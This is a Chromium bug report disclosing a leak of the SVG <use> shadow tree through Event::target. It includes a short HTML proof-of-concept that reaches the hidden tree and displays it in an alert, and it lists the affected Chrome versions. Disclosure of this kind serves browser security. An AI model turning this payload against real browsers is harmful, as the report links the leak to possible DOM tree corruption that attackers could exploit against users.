Reported by [email protected], Jul 24 2016
When an event is dispatched to an element in an SVG <use> shadow tree, Event::currentTarget returns the original corresponding node, but Event::target makes no attempt to redirect access. Therefore, the tree can be trivially leaked like this:
<svg>
<g id="a">
<image href="" onerror="if (event.currentTarget !== event.target) {alert(event.target.parentNode.parentNode)}"></image>
</g>
<use href="#a"></use>
</svg>
Gaining access to the internal shadow tree lets an attacker manipulate it so that focus events fire in circumstances that should be impossible, which may lead to DOM tree corruption.
Affected versions: Chrome 52.0.2743.82 (Stable), Chrome 52.0.2743.82 (Beta), Chrome 53.0.2785.21 (Dev), Chromium 54.0.2806.0 (Release build compiled today)
Link: https://bugs.chromium.org/p/chromium/issues/detail?id=655904